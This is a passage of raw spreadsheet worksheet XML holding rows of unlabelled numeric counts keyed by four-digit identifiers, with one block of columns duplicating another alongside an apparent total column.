        <v>14</v>
      </c>
      <c r="Q1365" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1366" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1366" s="7">
        <v>5294</v>
      </c>
      <c r="B1366" s="8">
        <v>0</v>
      </c>
      <c r="C1366" s="8">
        <v>0</v>
      </c>
      <c r="D1366" s="8">
        <v>2</v>
      </c>
      <c r="E1366" s="8">
        <v>0</v>
      </c>
      <c r="F1366" s="8">
        <v>5</v>
      </c>
      <c r="G1366" s="8">
        <v>2</v>
      </c>
      <c r="H1366" s="8">
        <v>9</v>
      </c>
      <c r="K1366" s="7">
        <v>5294</v>
      </c>
      <c r="L1366" s="8">
        <v>0</v>
      </c>
      <c r="M1366" s="8">
        <v>0</v>
      </c>
      <c r="N1366" s="8">
        <v>2</v>
      </c>
      <c r="O1366" s="8">
        <v>0</v>
      </c>
      <c r="P1366" s="8">
        <v>5</v>
      </c>
      <c r="Q1366" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1367" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1367" s="7">
        <v>5296</v>
      </c>
      <c r="B1367" s="8">
        <v>24</v>
      </c>
      <c r="C1367" s="8">
        <v>1</v>
      </c>
      <c r="D1367" s="8">
        <v>4</v>
      </c>
      <c r="E1367" s="8">
        <v>0</v>
      </c>
      <c r="F1367" s="8">
        <v>7</v>
      </c>
      <c r="G1367" s="8">
        <v>5</v>
      </c>
      <c r="H1367" s="8">
        <v>41</v>
      </c>
      <c r="K1367" s="7">
        <v>5296</v>
      </c>
      <c r="L1367" s="8">
        <v>24</v>
      </c>
      <c r="M1367" s="8">
        <v>1</v>
      </c>
      <c r="N1367" s="8">
        <v>4</v>
      </c>
      <c r="O1367" s="8">
        <v>0</v>
      </c>
      <c r="P1367" s="8">
        <v>7</v>
      </c>
      <c r="Q1367" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1368" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1368" s="7">
        <v>5298</v>
      </c>
      <c r="B1368" s="8">
        <v>25</v>
      </c>
      <c r="C1368" s="8">
        <v>1</v>
      </c>
      <c r="D1368" s="8">
        <v>15</v>
      </c>
      <c r="E1368" s="8">
        <v>0</v>
      </c>
      <c r="F1368" s="8">
        <v>3</v>
      </c>
      <c r="G1368" s="8">
        <v>2</v>
      </c>
      <c r="H1368" s="8">
        <v>46</v>
      </c>
      <c r="K1368" s="7">
        <v>5298</v>
      </c>
      <c r="L1368" s="8">
        <v>25</v>
      </c>
      <c r="M1368" s="8">
        <v>1</v>
      </c>
      <c r="N1368" s="8">
        <v>15</v>
      </c>
      <c r="O1368" s="8">
        <v>0</v>
      </c>
      <c r="P1368" s="8">
        <v>3</v>
      </c>
      <c r="Q1368" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1369" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1369" s="7">
        <v>5299</v>
      </c>
      <c r="B1369" s="8">
        <v>26</v>
      </c>
      <c r="C1369" s="8">
        <v>1</v>
      </c>
      <c r="D1369" s="8">
        <v>0</v>
      </c>
      <c r="E1369" s="8">
        <v>1</v>
      </c>
      <c r="F1369" s="8">
        <v>2</v>
      </c>
      <c r="G1369" s="8">
        <v>11</v>
      </c>
      <c r="H1369" s="8">
        <v>41</v>
      </c>
      <c r="K1369" s="7">
        <v>5299</v>
      </c>
      <c r="L1369" s="8">
        <v>26</v>
      </c>
      <c r="M1369" s="8">
        <v>1</v>
      </c>
      <c r="N1369" s="8">
        <v>0</v>
      </c>
      <c r="O1369" s="8">
        <v>1</v>
      </c>
      <c r="P1369" s="8">
        <v>2</v>
      </c>
      <c r="Q1369" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1370" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1370" s="7">
        <v>5300</v>
      </c>
      <c r="B1370" s="8">
        <v>6</v>
      </c>
      <c r="C1370" s="8">
        <v>0</v>
      </c>
      <c r="D1370" s="8">
        <v>0</v>
      </c>
      <c r="E1370" s="8">
        <v>0</v>
      </c>
      <c r="F1370" s="8">
        <v>4</v>
      </c>
      <c r="G1370" s="8">
        <v>2</v>
      </c>
      <c r="H1370" s="8">
        <v>12</v>
      </c>
      <c r="K1370" s="7">
        <v>5300</v>
      </c>
      <c r="L1370" s="8">
        <v>6</v>
      </c>
      <c r="M1370" s="8">
        <v>0</v>
      </c>
      <c r="N1370" s="8">
        <v>0</v>
      </c>
      <c r="O1370" s="8">
        <v>0</v>
      </c>
      <c r="P1370" s="8">
        <v>4</v>
      </c>
      <c r="Q1370" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1371" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1371" s="7">
        <v>5301</v>
      </c>
      <c r="B1371" s="8">
        <v>12</v>
      </c>
      <c r="C1371" s="8">
        <v>0</v>
      </c>
      <c r="D1371" s="8">
        <v>7</v>
      </c>
      <c r="E1371" s="8">
        <v>2</v>
      </c>
      <c r="F1371" s="8">
        <v>0</v>
      </c>
      <c r="G1371" s="8">
        <v>0</v>
      </c>
      <c r="H1371" s="8">
        <v>21</v>
      </c>
      <c r="K1371" s="7">
        <v>5301</v>
      </c>
      <c r="L1371" s="8">
        <v>12</v>
      </c>
      <c r="M1371" s="8">
        <v>0</v>
      </c>
      <c r="N1371" s="8">
        <v>7</v>
      </c>
      <c r="O1371" s="8">
        <v>2</v>
      </c>
      <c r="P1371" s="8">
        <v>0</v>
      </c>
      <c r="Q1371" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1372" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1372" s="7">
        <v>5304</v>
      </c>
      <c r="B1372" s="8">
        <v>25</v>
      </c>
      <c r="C1372" s="8">
        <v>1</v>
      </c>
      <c r="D1372" s="8">
        <v>38</v>
      </c>
      <c r="E1372" s="8">
        <v>15</v>
      </c>
      <c r="F1372" s="8">
        <v>14</v>
      </c>
      <c r="G1372" s="8">
        <v>7</v>
      </c>
      <c r="H1372" s="8">
        <v>100</v>
      </c>
      <c r="K1372" s="7">
        <v>5304</v>
      </c>
      <c r="L1372" s="8">
        <v>25</v>
      </c>
      <c r="M1372" s="8">
        <v>1</v>
      </c>
      <c r="N1372" s="8">
        <v>38</v>
      </c>
      <c r="O1372" s="8">
        <v>15</v>
      </c>
      <c r="P1372" s="8">
        <v>14</v>
      </c>
      <c r="Q1372" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1373" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1373" s="7">
        <v>5305</v>
      </c>
      <c r="B1373" s="8">
        <v>14</v>
      </c>
      <c r="C1373" s="8">
        <v>0</v>
      </c>
      <c r="D1373" s="8">
        <v>0</v>
      </c>
      <c r="E1373" s="8">
        <v>0</v>
      </c>
      <c r="F1373" s="8">
        <v>6</v>
      </c>
      <c r="G1373" s="8">
        <v>1</v>
      </c>
      <c r="H1373" s="8">
        <v>21</v>
      </c>
      <c r="K1373" s="7">
        <v>5305</v>
      </c>
      <c r="L1373" s="8">
        <v>14</v>
      </c>
      <c r="M1373" s="8">
        <v>0</v>
      </c>
      <c r="N1373" s="8">
        <v>0</v>
      </c>
      <c r="O1373" s="8">
        <v>0</v>
      </c>
      <c r="P1373" s="8">
        <v>6</v>
      </c>
      <c r="Q1373" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1374" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1374" s="7">
        <v>5306</v>
      </c>
      <c r="B1374" s="8">
        <v>25</v>
      </c>
      <c r="C1374" s="8">
        <v>0</v>
      </c>
      <c r="D1374" s="8">
        <v>16</v>
      </c>
      <c r="E1374" s="8">
        <v>31</v>
      </c>
      <c r="F1374" s="8">
        <v>23</v>
      </c>
      <c r="G1374" s="8">
        <v>34</v>
      </c>
      <c r="H1374" s="8">
        <v>129</v>
      </c>
      <c r="K1374" s="7">
        <v>5306</v>
      </c>
      <c r="L1374" s="8">
        <v>25</v>
      </c>
      <c r="M1374" s="8">
        <v>0</v>
      </c>
      <c r="N1374" s="8">
        <v>16</v>
      </c>
      <c r="O1374" s="8">
        <v>31</v>
      </c>
      <c r="P1374" s="8">
        <v>23</v>
      </c>
      <c r="Q1374" s="8">
        <v>34</v>
      </c>
    </row>
    <row r="1375" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1375" s="7">
        <v>5307</v>
      </c>
      <c r="B1375" s="8">
        <v>6</v>
      </c>
      <c r="C1375" s="8">
        <v>2</v>
      </c>
      <c r="D1375" s="8">
        <v>15</v>
      </c>
      <c r="E1375" s="8">
        <v>5</v>
      </c>
      <c r="F1375" s="8">
        <v>8</v>
      </c>
      <c r="G1375" s="8">
        <v>20</v>
      </c>
      <c r="H1375" s="8">
        <v>56</v>
      </c>
      <c r="K1375" s="7">
        <v>5307</v>
      </c>
      <c r="L1375" s="8">
        <v>6</v>
      </c>
      <c r="M1375" s="8">
        <v>2</v>
      </c>
      <c r="N1375" s="8">
        <v>15</v>
      </c>
      <c r="O1375" s="8">
        <v>5</v>
      </c>
      <c r="P1375" s="8">
        <v>8</v>
      </c>
      <c r="Q1375" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="1376" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1376" s="7">
        <v>5309</v>
      </c>
      <c r="B1376" s="8">
        <v>20</v>
      </c>
      <c r="C1376" s="8">
        <v>1</v>
      </c>
      <c r="D1376" s="8">
        <v>3</v>
      </c>
      <c r="E1376" s="8">
        <v>3</v>
      </c>
      <c r="F1376" s="8">
        <v>6</v>
      </c>
      <c r="G1376" s="8">
        <v>4</v>
      </c>
      <c r="H1376" s="8">
        <v>37</v>
      </c>
      <c r="K1376" s="7">
        <v>5309</v>
      </c>
      <c r="L1376" s="8">
        <v>20</v>
      </c>
      <c r="M1376" s="8">
        <v>1</v>
      </c>
      <c r="N1376" s="8">
        <v>3</v>
      </c>
      <c r="O1376" s="8">
        <v>3</v>
      </c>
      <c r="P1376" s="8">
        <v>6</v>
      </c>
      <c r="Q1376" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1377" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1377" s="7">
        <v>5310</v>
      </c>
      <c r="B1377" s="8">
        <v>0</v>
      </c>
      <c r="C1377" s="8">
        <v>0</v>
      </c>
      <c r="D1377" s="8">
        <v>0</v>
      </c>
      <c r="E1377" s="8">
        <v>0</v>
      </c>
      <c r="F1377" s="8">
        <v>3</v>
      </c>
      <c r="G1377" s="8">
        <v>3</v>
      </c>
      <c r="H1377" s="8">
        <v>6</v>
      </c>
      <c r="K1377" s="7">
        <v>5310</v>
      </c>
      <c r="L1377" s="8">
        <v>0</v>
      </c>
      <c r="M1377" s="8">
        <v>0</v>
      </c>
      <c r="N1377" s="8">
        <v>0</v>
      </c>
      <c r="O1377" s="8">
        <v>0</v>
      </c>
      <c r="P1377" s="8">
        <v>3</v>
      </c>
      <c r="Q1377" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1378" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1378" s="7">
        <v>5311</v>
      </c>
      <c r="B1378" s="8">
        <v>20</v>
      </c>
      <c r="C1378" s="8">
        <v>1</v>
      </c>
      <c r="D1378" s="8">
        <v>0</v>
      </c>
      <c r="E1378" s="8">
        <v>6</v>
      </c>
      <c r="F1378" s="8">
        <v>1</v>
      </c>
      <c r="G1378" s="8">
        <v>1</v>
      </c>
      <c r="H1378" s="8">
        <v>29</v>
      </c>
      <c r="K1378" s="7">
        <v>5311</v>
      </c>
      <c r="L1378" s="8">
        <v>20</v>
      </c>
      <c r="M1378" s="8">
        <v>1</v>
      </c>
      <c r="N1378" s="8">
        <v>0</v>
      </c>
      <c r="O1378" s="8">
        <v>6</v>
      </c>
      <c r="P1378" s="8">
        <v>1</v>
      </c>
      <c r="Q1378" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1379" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1379" s="7">
        <v>5313</v>
      </c>
      <c r="B1379" s="8">
        <v>6</v>
      </c>
      <c r="C1379" s="8">
        <v>1</v>
      </c>
      <c r="D1379" s="8">
        <v>26</v>
      </c>
      <c r="E1379" s="8">
        <v>2</v>
      </c>
      <c r="F1379" s="8">
        <v>4</v>
      </c>
      <c r="G1379" s="8">
        <v>2</v>
      </c>
      <c r="H1379" s="8">
        <v>41</v>
      </c>
      <c r="K1379" s="7">
        <v>5313</v>
      </c>
      <c r="L1379" s="8">
        <v>6</v>
      </c>
      <c r="M1379" s="8">
        <v>1</v>
      </c>
      <c r="N1379" s="8">
        <v>26</v>
      </c>
      <c r="O1379" s="8">
        <v>2</v>
      </c>
      <c r="P1379" s="8">
        <v>4</v>
      </c>
      <c r="Q1379" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1380" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1380" s="7">
        <v>5314</v>
      </c>
      <c r="B1380" s="8">
        <v>26</v>
      </c>
      <c r="C1380" s="8">
        <v>0</v>
      </c>
      <c r="D1380" s="8">
        <v>30</v>
      </c>
      <c r="E1380" s="8">
        <v>30</v>
      </c>
      <c r="F1380" s="8">
        <v>16</v>
      </c>
      <c r="G1380" s="8">
        <v>16</v>
      </c>
      <c r="H1380" s="8">
        <v>118</v>
      </c>
      <c r="K1380" s="7">
        <v>5314</v>
      </c>
      <c r="L1380" s="8">
        <v>26</v>
      </c>
      <c r="M1380" s="8">
        <v>0</v>
      </c>
      <c r="N1380" s="8">
        <v>30</v>
      </c>
      <c r="O1380" s="8">
        <v>30</v>
      </c>
      <c r="P1380" s="8">
        <v>16</v>
      </c>
      <c r="Q1380" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="1381" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1381" s="7">
        <v>5315</v>
      </c>
      <c r="B1381" s="8">
        <v>20</v>
      </c>
      <c r="C1381" s="8">
        <v>1</v>
      </c>
      <c r="D1381" s="8">
        <v>20</v>
      </c>
      <c r="E1381" s="8">
        <v>0</v>
      </c>
      <c r="F1381" s="8">
        <v>0</v>
      </c>
      <c r="G1381" s="8">
        <v>2</v>
      </c>
      <c r="H1381" s="8">
        <v>43</v>
      </c>
      <c r="K1381" s="7">
        <v>5315</v>
      </c>
      <c r="L1381" s="8">
        <v>20</v>
      </c>
      <c r="M1381" s="8">
        <v>1</v>
      </c>
      <c r="N1381" s="8">
        <v>20</v>
      </c>
      <c r="O1381" s="8">
        <v>0</v>
      </c>
      <c r="P1381" s="8">
        <v>0</v>
      </c>
      <c r="Q1381" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1382" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1382" s="7">
        <v>5322</v>
      </c>
      <c r="B1382" s="8">
        <v>24</v>
      </c>
      <c r="C1382" s="8">
        <v>1</v>
      </c>
      <c r="D1382" s="8">
        <v>1</v>
      </c>
      <c r="E1382" s="8">
        <v>0</v>
      </c>
      <c r="F1382" s="8">
        <v>0</v>
      </c>
      <c r="G1382" s="8">
        <v>0</v>
      </c>
      <c r="H1382" s="8">
        <v>26</v>
      </c>
      <c r="K1382" s="7">
        <v>5322</v>
      </c>
      <c r="L1382" s="8">
        <v>24</v>
      </c>
      <c r="M1382" s="8">
        <v>1</v>
      </c>
      <c r="N1382" s="8">
        <v>1</v>
      </c>
      <c r="O1382" s="8">
        <v>0</v>
      </c>
      <c r="P1382" s="8">
        <v>0</v>
      </c>
      <c r="Q1382" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1383" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1383" s="7">
        <v>5325</v>
      </c>
      <c r="B1383" s="8">
        <v>24</v>
      </c>
      <c r="C1383" s="8">
        <v>0</v>
      </c>
      <c r="D1383" s="8">
        <v>6</v>
      </c>
      <c r="E1383" s="8">
        <v>0</v>
      </c>
      <c r="F1383" s="8">
        <v>4</v>
      </c>
      <c r="G1383" s="8">
        <v>6</v>
      </c>
      <c r="H1383" s="8">
        <v>40</v>
      </c>
      <c r="K1383" s="7">
        <v>5325</v>
      </c>
      <c r="L1383" s="8">
        <v>24</v>
      </c>
      <c r="M1383" s="8">
        <v>0</v>
      </c>
      <c r="N1383" s="8">
        <v>6</v>
      </c>
      <c r="O1383" s="8">
        <v>0</v>
      </c>
      <c r="P1383" s="8">
        <v>4</v>
      </c>
      <c r="Q1383" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1384" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1384" s="7">
        <v>5326</v>
      </c>
      <c r="B1384" s="8">
        <v>0</v>
      </c>
      <c r="C1384" s="8">
        <v>0</v>
      </c>
      <c r="D1384" s="8">
        <v>11</v>
      </c>
      <c r="E1384" s="8">
        <v>4</v>
      </c>
      <c r="F1384" s="8">
        <v>2</v>
      </c>
      <c r="G1384" s="8">
        <v>2</v>
      </c>
      <c r="H1384" s="8">
        <v>19</v>
      </c>
      <c r="K1384" s="7">
        <v>5326</v>
      </c>
      <c r="L1384" s="8">
        <v>0</v>
      </c>
      <c r="M1384" s="8">
        <v>0</v>
      </c>
      <c r="N1384" s="8">
        <v>11</v>
      </c>
      <c r="O1384" s="8">
        <v>4</v>
      </c>
      <c r="P1384" s="8">
        <v>2</v>
      </c>
      <c r="Q1384" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1385" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1385" s="7">
        <v>5330</v>
      </c>
      <c r="B1385" s="8">
        <v>0</v>
      </c>
      <c r="C1385" s="8">
        <v>0</v>
      </c>
      <c r="D1385" s="8">
        <v>0</v>
      </c>
      <c r="E1385" s="8">
        <v>5</v>
      </c>
      <c r="F1385" s="8">
        <v>0</v>
      </c>
      <c r="G1385" s="8">
        <v>5</v>
      </c>
      <c r="H1385" s="8">
        <v>10</v>
      </c>
      <c r="K1385" s="7">
        <v>5330</v>
      </c>
      <c r="L1385" s="8">
        <v>0</v>
      </c>
      <c r="M1385" s="8">
        <v>0</v>
      </c>
      <c r="N1385" s="8">
        <v>0</v>
      </c>
      <c r="O1385" s="8">
        <v>5</v>
      </c>
      <c r="P1385" s="8">
        <v>0</v>
      </c>
      <c r="Q1385" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1386" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1386" s="7">
        <v>5332</v>
      </c>
      <c r="B1386" s="8">
        <v>0</v>
      </c>
      <c r="C1386" s="8">
        <v>0</v>
      </c>
      <c r="D1386" s="8">
        <v>0</v>
      </c>
      <c r="E1386" s="8">
        <v>0</v>
      </c>
      <c r="F1386" s="8">
        <v>11</v>
      </c>
      <c r="G1386" s="8">
        <v>6</v>
      </c>
      <c r="H1386" s="8">
        <v>17</v>
      </c>
      <c r="K1386" s="7">
        <v>5332</v>
      </c>
      <c r="L1386" s="8">
        <v>0</v>
      </c>
      <c r="M1386" s="8">
        <v>0</v>
      </c>
      <c r="N1386" s="8">
        <v>0</v>
      </c>
      <c r="O1386" s="8">
        <v>0</v>
      </c>
      <c r="P1386" s="8">
        <v>11</v>
      </c>
      <c r="Q1386" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1387" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1387" s="7">
        <v>5424</v>
      </c>
      <c r="B1387" s="8">
        <v>0</v>
      </c>
      <c r="C1387" s="8">
        <v>0</v>
      </c>
      <c r="D1387" s="8">
        <v>2</v>
      </c>
      <c r="E1387" s="8">
        <v>7</v>
      </c>
      <c r="F1387" s="8">
        <v>0</v>
      </c>
      <c r="G1387" s="8">
        <v>0</v>
      </c>
      <c r="H1387" s="8">
        <v>9</v>
      </c>
      <c r="K1387" s="7">
        <v>5424</v>
      </c>
      <c r="L1387" s="8">
        <v>0</v>
      </c>
      <c r="M1387" s="8">
        <v>0</v>
      </c>
      <c r="N1387" s="8">
        <v>2</v>
      </c>
      <c r="O1387" s="8">
        <v>7</v>
      </c>
      <c r="P1387" s="8">
        <v>0</v>
      </c>
      <c r="Q1387" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1388" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1388" s="7">
        <v>5426</v>
      </c>
      <c r="B1388" s="8">
        <v>25</v>
      </c>
      <c r="C1388" s="8">
        <v>1</v>
      </c>
      <c r="D1388" s="8">
        <v>1</v>
      </c>
      <c r="E1388" s="8">
        <v>2</v>
      </c>
      <c r="F1388" s="8">
        <v>0</v>
      </c>
      <c r="G1388" s="8">
        <v>3</v>
      </c>
      <c r="H1388" s="8">
        <v>32</v>
      </c>
      <c r="K1388" s="7">
        <v>5426</v>
      </c>
      <c r="L1388" s="8">
        <v>25</v>
      </c>
      <c r="M1388" s="8">
        <v>1</v>
      </c>
      <c r="N1388" s="8">
        <v>1</v>
      </c>
      <c r="O1388" s="8">
        <v>2</v>
      </c>
      <c r="P1388" s="8">
        <v>0</v>
      </c>
      <c r="Q1388" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1389" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1389" s="7">
        <v>5427</v>
      </c>
      <c r="B1389" s="8">
        <v>25</v>
      </c>
      <c r="C1389" s="8">
        <v>1</v>
      </c>
      <c r="D1389" s="8">
        <v>0</v>
      </c>
      <c r="E1389" s="8">
        <v>0</v>
      </c>
      <c r="F1389" s="8">
        <v>1</v>
      </c>
      <c r="G1389" s="8">
        <v>6</v>
      </c>
      <c r="H1389" s="8">
        <v>33</v>
      </c>
      <c r="K1389" s="7">
        <v>5427</v>
      </c>
      <c r="L1389" s="8">
        <v>25</v>
      </c>
      <c r="M1389" s="8">
        <v>1</v>
      </c>
      <c r="N1389" s="8">
        <v>0</v>
      </c>
      <c r="O1389" s="8">
        <v>0</v>
      </c>
      <c r="P1389" s="8">
        <v>1</v>
      </c>
      <c r="Q1389" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1390" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1390" s="7">
        <v>5431</v>
      </c>
      <c r="B1390" s="8">
        <v>26</v>
      </c>
      <c r="C1390" s="8">
        <v>1</v>
      </c>
      <c r="D1390" s="8">
        <v>5</v>
      </c>
      <c r="E1390" s="8">
        <v>5</v>
      </c>
      <c r="F1390" s="8">
        <v>5</v>
      </c>
      <c r="G1390" s="8">
        <v>4</v>
      </c>
      <c r="H1390" s="8">
        <v>46</v>
      </c>
      <c r="K1390" s="7">
        <v>5431</v>
      </c>
      <c r="L1390" s="8">
        <v>26</v>
      </c>
      <c r="M1390" s="8">
        <v>1</v>
      </c>
      <c r="N1390" s="8">
        <v>5</v>
      </c>
      <c r="O1390" s="8">
        <v>5</v>
      </c>
      <c r="P1390" s="8">
        <v>5</v>
      </c>
      <c r="Q1390" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1391" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1391" s="7">
        <v>5432</v>
      </c>
      <c r="B1391" s="8">
        <v>27</v>
      </c>
      <c r="C1391" s="8">
        <v>0</v>
      </c>
      <c r="D1391" s="8">
        <v>4</v>
      </c>
      <c r="E1391" s="8">
        <v>0</v>
      </c>
      <c r="F1391" s="8">
        <v>6</v>
      </c>
      <c r="G1391" s="8">
        <v>2</v>
      </c>
      <c r="H1391" s="8">
        <v>39</v>
      </c>
      <c r="K1391" s="7">
        <v>5432</v>
      </c>
      <c r="L1391" s="8">
        <v>27</v>
      </c>
      <c r="M1391" s="8">
        <v>0</v>
      </c>
      <c r="N1391" s="8">
        <v>4</v>
      </c>
      <c r="O1391" s="8">
        <v>0</v>
      </c>
      <c r="P1391" s="8">
        <v>6</v>
      </c>
      <c r="Q1391" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1392" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1392" s="7">
        <v>5433</v>
      </c>
      <c r="B1392" s="8">
        <v>5</v>
      </c>
      <c r="C1392" s="8">
        <v>0</v>
      </c>
      <c r="D1392" s="8">
        <v>0</v>
      </c>
      <c r="E1392" s="8">
        <v>5</v>
      </c>
      <c r="F1392" s="8">
        <v>0</v>
      </c>
      <c r="G1392" s="8">
        <v>5</v>
      </c>
      <c r="H1392" s="8">
        <v>15</v>
      </c>
      <c r="K1392" s="7">
        <v>5433</v>
      </c>
      <c r="L1392" s="8">
        <v>5</v>
      </c>
      <c r="M1392" s="8">
        <v>0</v>
      </c>
      <c r="N1392" s="8">
        <v>0</v>
      </c>
      <c r="O1392" s="8">
        <v>5</v>
      </c>
      <c r="P1392" s="8">
        <v>0</v>
      </c>
      <c r="Q1392" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1393" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1393" s="7">
        <v>5434</v>
      </c>
      <c r="B1393" s="8">
        <v>24</v>
      </c>
      <c r="C1393" s="8">
        <v>1</v>
      </c>
      <c r="D1393" s="8">
        <v>0</v>
      </c>
      <c r="E1393" s="8">
        <v>0</v>
      </c>
      <c r="F1393" s="8">
        <v>1</v>
      </c>
      <c r="G1393" s="8">
        <v>3</v>
      </c>
      <c r="H1393" s="8">
        <v>29</v>
      </c>
      <c r="K1393" s="7">
        <v>5434</v>
      </c>
      <c r="L1393" s="8">
        <v>24</v>
      </c>
      <c r="M1393" s="8">
        <v>1</v>
      </c>
      <c r="N1393" s="8">
        <v>0</v>
      </c>
      <c r="O1393" s="8">
        <v>0</v>
      </c>
      <c r="P1393" s="8">
        <v>1</v>
      </c>
      <c r="Q1393" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1394" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1394" s="7">
        <v>5435</v>
      </c>
      <c r="B1394" s="8">
        <v>26</v>
      </c>
      <c r="C1394" s="8">
        <v>0</v>
      </c>
      <c r="D1394" s="8">
        <v>3</v>
      </c>
      <c r="E1394" s="8">
        <v>0</v>
      </c>
      <c r="F1394" s="8">
        <v>1</v>
      </c>
      <c r="G1394" s="8">
        <v>1</v>
      </c>
      <c r="H1394" s="8">
        <v>31</v>
      </c>
      <c r="K1394" s="7">
        <v>5435</v>
      </c>
      <c r="L1394" s="8">
        <v>26</v>
      </c>
      <c r="M1394" s="8">
        <v>0</v>
      </c>
      <c r="N1394" s="8">
        <v>3</v>
      </c>
      <c r="O1394" s="8">
        <v>0</v>
      </c>
      <c r="P1394" s="8">
        <v>1</v>
      </c>
      <c r="Q1394" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1395" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1395" s="7">
        <v>5439</v>
      </c>
      <c r="B1395" s="8">
        <v>26</v>
      </c>
      <c r="C1395" s="8">
        <v>0</v>
      </c>
      <c r="D1395" s="8">
        <v>50</v>
      </c>
      <c r="E1395" s="8">
        <v>8</v>
      </c>
      <c r="F1395" s="8">
        <v>25</v>
      </c>
      <c r="G1395" s="8">
        <v>4</v>
      </c>
      <c r="H1395" s="8">
        <v>113</v>
      </c>
      <c r="K1395" s="7">
        <v>5439</v>
      </c>
      <c r="L1395" s="8">
        <v>26</v>
      </c>
      <c r="M1395" s="8">
        <v>0</v>
      </c>
      <c r="N1395" s="8">
        <v>50</v>
      </c>
      <c r="O1395" s="8">
        <v>8</v>
      </c>
      <c r="P1395" s="8">
        <v>25</v>
      </c>
      <c r="Q1395" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1396" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1396" s="7">
        <v>5440</v>
      </c>
      <c r="B1396" s="8">
        <v>0</v>
      </c>
      <c r="C1396" s="8">
        <v>0</v>
      </c>
      <c r="D1396" s="8">
        <v>0</v>
      </c>
      <c r="E1396" s="8">
        <v>2</v>
      </c>
      <c r="F1396" s="8">
        <v>2</v>
      </c>
      <c r="G1396" s="8">
        <v>4</v>
      </c>
      <c r="H1396" s="8">
        <v>8</v>
      </c>
      <c r="K1396" s="7">
        <v>5440</v>
      </c>
      <c r="L1396" s="8">
        <v>0</v>
      </c>
      <c r="M1396" s="8">
        <v>0</v>
      </c>
      <c r="N1396" s="8">
        <v>0</v>
      </c>
      <c r="O1396" s="8">
        <v>2</v>
      </c>
      <c r="P1396" s="8">
        <v>2</v>
      </c>
      <c r="Q1396" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1397" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1397" s="7">
        <v>5444</v>
      </c>
      <c r="B1397" s="8">
        <v>28</v>
      </c>
      <c r="C1397" s="8">
        <v>0</v>
      </c>
      <c r="D1397" s="8">
        <v>0</v>
      </c>
      <c r="E1397" s="8">
        <v>0</v>
      </c>
      <c r="F1397" s="8">
        <v>11</v>
      </c>
      <c r="G1397" s="8">
        <v>11</v>
      </c>
      <c r="H1397" s="8">
        <v>50</v>
      </c>
      <c r="K1397" s="7">
        <v>5444</v>
      </c>
      <c r="L1397" s="8">
        <v>28</v>
      </c>
      <c r="M1397" s="8">
        <v>0</v>
      </c>
      <c r="N1397" s="8">
        <v>0</v>
      </c>
      <c r="O1397" s="8">
        <v>0</v>
      </c>
      <c r="P1397" s="8">
        <v>11</v>
      </c>
      <c r="Q1397" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1398" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1398" s="7">
        <v>5446</v>
      </c>
      <c r="B1398" s="8">
        <v>15</v>
      </c>
      <c r="C1398" s="8">
        <v>15</v>
      </c>
      <c r="D1398" s="8">
        <v>0</v>
      </c>
      <c r="E1398" s="8">
        <v>1</v>
      </c>
      <c r="F1398" s="8">
        <v>2</v>
      </c>
      <c r="G1398" s="8">
        <v>5</v>
      </c>
      <c r="H1398" s="8">
        <v>38</v>
      </c>
